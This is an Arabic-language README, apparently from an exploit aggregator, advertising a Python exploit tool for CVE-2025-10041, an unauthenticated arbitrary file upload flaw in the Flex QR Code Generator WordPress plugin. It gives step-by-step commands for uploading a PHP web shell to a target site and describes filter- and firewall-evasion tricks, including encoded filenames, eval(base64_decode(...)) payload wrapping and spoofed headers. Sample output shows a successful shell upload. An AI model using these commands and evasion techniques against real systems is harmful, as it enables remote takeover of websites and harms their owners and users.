## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NXPLOITED-CVE-2025-10041
# CVE-2025-10041
Flex QR Code Generator <= 1.2.5 - رفع ملفات اعتباطي بدون مصادقة
# 🚨 Flex QR Code Generator ≤ 1.2.5 - رفع ملفات اعتباطي بدون مصادقة
* * *
## 📝 الوصف
إضافة **Flex QR Code Generator** لووردبريس معرضة لرفع ملفات اعتباطي بسبب عدم التحقق من نوع الملف في دالة `save_qr_code_to_db()` في جميع الإصدارات حتى `1.2.5` ضمناً.
يسمح ذلك لـ **المهاجمين بدون مصادقة** برفع ملفات ضارة على خادم الموقع المستهدف، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
* **CVE:** `CVE-2025-10041`
* **CVSS:** `9.8 (حرج)`
* * *
## 💡 حول هذا السكريبت
`CVE-2025-10041.py` هو أداة استغلال احترافية مصممة لأتمتة الهجوم من خلال استغلال هذه الثغرة.
توفر ميزات متقدمة لتجاوس الحمايات الشائعة وتقنيات الترميز.
* * *
## ⚙️ الميزات
* **اكتشاف تلقائي للثغرة** (فحص الإصدار)
* **رفع ملفات اعتباطي** (بما في ذلك قوالب PHP)
* **تجاوس ترميز اسم الملف** : Base64 أو URL
* **تجاوس ترميز المحتوى** : غلاف Base64 PHP لشفرة القالب
* **رؤوس HTTP عشوائية** لتجنب جدران الحماية الأساسية
* **دعم الرؤوس المخصصة**
* **واجهة سطر أوامر كاملة** مع تحليل الوسائط ورسالة المساعدة
* * *
## 🖥️ طريقة الاستخدام
### 1\. **الاستغلال الأساسي**
root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com
### 2\. **ترميز اسم القالب**
root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
### 3\. **ترميز محتوى القالب**
root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
### 4\. **اسم ملف القالب المخصص**
root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
### 5\. **متقدم (دمج الخيارات)**
root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
### 6\. **رؤوس مخصصة**
root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
* * *
## 🆘 المساعدة
لعرض جميع الخيارات المتاحة وتعليمات الاستخدام:
root@kitploit:~
python3 CVE-2025-10041.py --help
* * *
## 🔓 تقنيات التجاوس
* **ترميز اسم الملف** : بعض الخوادم تحظر `.php` أو الأسماء المشبوهة؛ الترميز قد يتجاوز الفلاتر.
* **ترميز المحتوى** : تضمين شفرة القالب داخل `eval(base64_decode(...))` قد يتجاوز فلاتر المحتوى.
* **رؤوس عشوائية** : تدوير وكيل المستخدم والمرجع وملفات تعريف الارتباط لتجنب الاكتشاف.
* **رؤوس مخصصة** : إضافة رؤوسك الخاصة لتجاوس متقدم.
* * *
## 📋 مثال على المخرجات
root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
* * *
## ⚠️ إخلاء مسؤولية
هذا السكريبت مقدم **لأغراض تعليمية وبحثية واختبارات الاختراق المصرح بها فقط**.
**الاستخدام غير المصرح به** ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها ممنوع منعاً باتاً وغير قانوني.
المؤلف **غير مسؤول** عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
* * *
## ✍️ من إعداد:
_Nxploited (Khaled Alenazi)_
* * *